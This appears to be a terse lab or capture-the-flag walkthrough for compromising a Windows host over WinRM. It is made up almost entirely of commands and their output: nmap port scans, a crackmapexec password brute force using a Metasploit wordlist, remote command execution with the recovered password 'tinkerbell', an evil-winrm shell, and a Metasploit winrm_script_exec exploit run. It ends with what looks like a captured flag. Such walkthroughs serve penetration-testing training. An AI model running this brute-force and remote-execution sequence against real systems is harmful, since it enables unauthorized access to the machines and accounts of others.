Copy ping 10.4.30.175
nmap --top-ports 7000 10.4.30.175
Copy PORT STATE SERVICE
135/tcp open msrpc
139/tcp open netbios-ssn
445/tcp open microsoft-ds
3389/tcp open ms-wbt-server
5985/tcp open wsman
Copy nmap -sV -p 5985 10.4.30.175
Copy PORT STATE SERVICE VERSION
5985/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
Copy crackmapexec winrm 10.4.30.175 -u administrator -p /usr/share/metasploit-framework/data/wordlists/unix_passwords.txt
Copy crackmapexec winrm 10.4.30.175 -u administrator -p tinkerbell -x "whoami"
crackmapexec winrm 10.4.30.175 -u administrator -p tinkerbell -x "systeminfo"
Copy evil-winrm.rb -u administrator -p 'tinkerbell' -i 10.4.30.175
Copy search winrm_script
use exploit/windows/winrm/winrm_script_exec
set RHOSTS 10.4.30.175
set USERNAME administrator
set PASSWORD tinkerbell
set FORCE_VBS true
exploit 3c716f95616eec677a7078f92657a230
